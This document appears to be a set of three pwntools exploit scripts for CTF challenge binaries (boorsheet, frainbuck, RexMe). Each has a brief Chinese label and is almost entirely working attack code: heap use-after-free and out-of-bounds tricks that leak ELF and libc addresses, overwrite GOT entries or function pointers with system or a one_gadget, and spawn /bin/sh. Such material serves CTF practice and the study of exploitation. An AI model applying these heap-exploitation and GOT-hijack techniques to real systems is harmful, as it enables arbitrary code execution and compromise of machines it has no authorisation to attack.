boorsheet
- 利用uaf劫持程序控制流
from pwn import *
# Verbose pwntools logging for the whole session (every tube send/recv is echoed).
context.log_level = 'debug'
def create_char(length, name, type_char):
    """Drive menu choice 1: send *length* as a line, *name* raw, then *type_char* as a line."""
    p.sendlineafter('choice : ', '1')
    p.sendlineafter(' name :', str(length))
    p.sendafter('character :', name)
    p.sendlineafter('character :', type_char)
def view_char():
    """Select menu choice 2 at the next 'choice : ' prompt."""
    p.sendlineafter('choice : ', '2')
def delete_char(index):
    """Select menu choice 3, then answer the 'to eat:' prompt with *index*."""
    p.sendlineafter('choice : ', '3')
    p.sendlineafter('to eat:', str(index))
def clean():
    """Select menu choice 4 at the next 'choice : ' prompt."""
    p.sendlineafter('choice : ', '4')
def yincang():
    """Send menu choice '1337' at the next prompt (yincang is Chinese for 'hidden')."""
    p.sendlineafter('choice : ', '1337')
def new(size, name, content):
    """Issue the 'new' command at the '$ ' prompt and answer the size, name and content prompts."""
    p.sendlineafter('$ ', 'new')
    p.sendlineafter('size:', str(size))
    p.sendlineafter('name:', name)
    p.sendlineafter('content:', content)
def edit(index, name, content):
    """Issue the 'edit' command for entry *index*, then send the new name and content."""
    p.sendlineafter('$ ', 'edit')
    p.sendlineafter('index:', str(index))
    p.sendlineafter('name:', name)
    p.sendlineafter('content:', content)
def delete(index):
    """Issue the 'delete' command for entry *index*."""
    p.sendlineafter('$ ', 'delete')
    p.sendlineafter('index:', str(index))
def show(index):
    """Issue the 'show' command for entry *index*; the reply is left for the caller to read."""
    p.sendlineafter('$ ', 'show')
    p.sendlineafter('index:', str(index))
def mark(index, mark_info):
    """Issue the 'mark' command: *index* at the 'mark:' prompt, *mark_info* at the 'info:' prompt."""
    p.sendlineafter('$ ', 'mark')
    p.sendlineafter('mark:', str(index))
    p.sendlineafter('info:', mark_info)
def show_mark(index):
    """Issue the 'show_mark' command for mark *index*; the reply is left for the caller to read."""
    p.sendlineafter('$ ', 'show_mark')
    p.sendlineafter('index:', str(index))
def delete_mark(index):
    """Issue the 'delete_mark' command for mark *index*."""
    p.sendlineafter('$ ', 'delete_mark')
    p.sendlineafter('index:', str(index))
def edit_mark(index):
    """Issue the 'edit_mark' command for mark *index*.

    Only the index is sent; any further prompt the command shows is not answered here.
    """
    p.sendlineafter('$ ', 'edit_mark')
    p.sendlineafter('index:', str(index))
# Written for Python 2 pwntools: payloads are str and recv() output is padded with a str.
p = process('./boorsheet')
elf = ELF('./boorsheet')
# GOT slot of puts as an in-binary offset; elf_base is added to it once leaked below.
puts_got = elf.got['puts']
yincang()
new(0x10,'a','1')
mark(0,'b')
#use uaf to hijack note->content --> struct_mark
delete_mark(0)
#leak elf_base
new(0x18,'b','2'*0xf)
show(1)
p.recvuntil('2'*0xf+'\x00')
# 0x11E6: build-specific offset of the leaked pointer inside the binary — TODO confirm for other builds
elf_base = u64(p.recv(8)) - 0x11E6
log.success('elf_base addr : 0x%x'%elf_base)
#leak libc_base
edit(1,'b',p32(0) + p32(0) + p64(puts_got+elf_base)[:6])
show_mark(0)
# Hard-coded offsets from the author's libc build; they will not match another libc version.
offset_puts = 0x000000000006f690
offset_system = 0x0000000000045390
offset_str_bin_sh = 0x18cd57
# recv(6) yields a 6-byte address; pad to 8 bytes before unpacking
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_puts
log.success('libc_base addr : 0x%x'%libc_base)
system_addr = libc_base + offset_system
binsh_addr = libc_base + offset_str_bin_sh
log.success('system addr : 0x%x'%system_addr)
log.success('binsh addr : 0x%x'%binsh_addr)
#hijack *puts_function -> system('/bin/sh\x00')
edit(1,'b',p32(0) + p32(0) + p64(binsh_addr) + p64(system_addr))
#trigger system('/bin/sh\x00')
show_mark(0)
p.interactive()
`
frainbuck
- 利用类似brainfuck进行数组越界泄漏libc改got表
from pwn import *
# Verbose pwntools logging for the whole session.
context.log_level = 'debug'
# Written for Python 2 pwntools: payloads are str and recv() output is padded with a str.
p = process('./frainbuck')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Absolute addresses inside the target binary, taken from the author's build — TODO confirm
stdout = 0x602080
ptr_data = 0x6020C0
exit_got = 0x602060
# Resolved from the local libc, so this value adapts to whatever libc is installed.
_IO_2_1_stdout_offset = libc.symbols['_IO_2_1_stdout_']
'''
> ++ptr;
< --ptr;
+ ++*ptr;
- --*ptr;
. putchar(*ptr);
, *ptr=getchar();
[ while(*ptr){
] }
'''
# Command semantics are listed in the string literal above.
payload = '<'*(ptr_data - stdout)    # walk the pointer down by (ptr_data - stdout) cells; assumes it starts at ptr_data
payload += '[.>]'                    # print cells, advancing, until a zero cell is hit
payload += '<'*6
payload += '<'*(stdout - exit_got)
payload += ',[>,]'                   # read input into successive cells until a zero byte is read
#gdb.attach(p,'b *0x04009A9')
p.recvuntil('code: ')
p.sendline(payload)
# recv(6) yields a 6-byte address; pad to 8 bytes before unpacking
libc_base = u64(p.recv(6).ljust(8,'\x00')) - _IO_2_1_stdout_offset
# 0x45216 is a hard-coded offset for one specific libc build, unlike the symbol resolved above;
# it must belong to the same libc as _IO_2_1_stdout_offset.
one_gadget = libc_base + 0x45216
log.success('libc_base addr : 0x%x'%libc_base)
log.success('one_gadget addr : 0x%x'%one_gadget)
p.send(p64(one_gadget))
p.interactive()
RexMe
- uaf利用name泄漏libc,改写got表
from pwn import *
# Verbose pwntools logging for the whole session.
context.log_level = 'debug'
def login(name):
    """Pick menu choice 1 and send *name* followed by a NUL byte at the 'name:' prompt."""
    p.sendlineafter('choice:', '1')
    p.sendafter('name:', name + '\x00')
def register(size, name, age, des):
    """Pick menu choice 2 and answer the size, name, age and description prompts.

    *size* and *age* are sent as lines; *name* and *des* are sent raw (no newline).
    """
    p.sendlineafter('choice:', '2')
    p.sendlineafter(' size:', str(size))
    p.sendafter('name:', name)
    p.sendlineafter('age:', str(age))
    p.sendafter('description:', des)
def view_profile():
    """Pick menu choice 1 at the next 'choice:' prompt."""
    p.sendlineafter('choice:', '1')
def updata_profile(name, age, des):
    """Pick menu choice 2 and answer the name (raw), age (line) and description (raw) prompts."""
    p.sendlineafter('choice:', '2')
    p.sendafter('name:', name)
    p.sendlineafter('age:', str(age))
    p.sendafter('description:', des)
def add_or_delete_friend(name, a_d):
    """Pick menu choice 3, send *name* plus a NUL byte, then answer the (a/d) prompt with *a_d*."""
    p.sendlineafter('choice:', '3')
    p.sendafter('name:', name + '\x00')
    p.sendlineafter('this friend?(a/d)', a_d)
def send_a_message(name, title, content):
    """Pick menu choice 4: recipient *name* plus a NUL byte, then *title* and *content* raw."""
    p.sendlineafter('choice:', '4')
    p.sendafter('msg to:', name + '\x00')
    p.sendafter('title:', title)
    p.sendafter('content:', content)
def view_your_message():
    """Pick menu choice 5 at the next 'choice:' prompt."""
    p.sendlineafter('choice:', '5')
def logout():
    """Pick menu choice 6 at the next 'choice:' prompt."""
    p.sendlineafter('choice:', '6')
# Written for Python 2 pwntools: payloads are str and recv() output is padded with a str.
p = process('./RexMe')
elf = ELF('./RexMe')
# Loaded but never referenced in this script; the libc offsets below are hard-coded instead.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Absolute address from the author's build — TODO confirm for other builds
strdup_plt = 0x4007f6
strdup_got = elf.got['strdup']
register(10,'a'*8,20,'a')
register(10,'b'*8,20,'b')
#gdb.attach(p,'b *0x40142F')
login('a'*8)
add_or_delete_friend('b'*8,'a')
add_or_delete_friend('b'*8,'d')
logout()
#leak libc
register(10,p64(strdup_got),20,'b')
login(p64(strdup_plt))
send_a_message('a'*8,'a','a')
view_profile()
# Hard-coded offsets from the author's libc build; they will not match another libc version.
offset_strdup = 0x000000000008b470
offset_system = 0x0000000000045390
p.recvuntil('Username:')
# recv(6) yields a 6-byte address; pad to 8 bytes before unpacking
libc_base = u64(p.recv(6).ljust(8,'\x00')) - offset_strdup
log.success('libc_base addr : 0x%x'%libc_base)
# Computed and logged only; system_addr is what is actually written below.
one_gadget = libc_base + 0x45216
log.success('one_gadget addr : 0x%x'%one_gadget)
system_addr = libc_base + offset_system
log.success('system addr : 0x%x'%system_addr)
#hijack strdup_got -> system_addr
updata_profile(p64(system_addr),'20','b')
#system('/bin/sh\x00')
# Same steps as send_a_message() up to the title; the content prompt is deliberately not answered here.
p.recvuntil('choice:')
p.sendline('4')
p.recvuntil('msg to:')
p.send('a'*8+'\x00')
p.recvuntil('title:')
p.send('/bin/sh\x00')
p.interactive()